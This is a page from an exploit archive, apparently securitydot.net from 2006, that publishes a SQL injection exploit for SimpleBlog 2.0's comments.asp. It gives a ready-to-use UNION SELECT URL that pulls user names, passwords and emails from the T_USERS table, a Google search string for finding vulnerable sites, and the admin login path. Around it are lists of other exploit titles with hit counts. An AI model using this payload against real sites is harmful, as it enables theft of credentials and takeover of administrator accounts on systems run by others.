exploits , vulnerabilities , articles , SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Vulnerability

2007-04-14 QDBlog 0.4 (SQL Injection/LFI) Multiple Remote Vulnerabilities
2007-04-09 MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability
2007-04-03 Xoops Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
2007-03-30 sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit
2007-03-20 GeBlog 0.1 GLOBALS[tplname] Local File Inclusion Exploit (win)
2007-03-16 Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit

2006-08-20

SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Vulnerability

Rated as : High Risk

################################################################################
##                                                                        
   ##

##  SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit   
                ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##

##  Credit by        |  Chironex Fleckeri                                 
   ##

##  Mail             |  ChironeX.FleckeriX@Gmail.Com                      
   ##

##  Googledork       |  Powered By SimpleBlog 2.0                         
   ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##

##                                                                        
   ##
################################################################################

############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT
ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS
WHERE id=1 #
############################################################################################################################################################

###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################
securitydot.net - 2006-08-20

Exploits - newest 10 RSS | More

2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23885 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit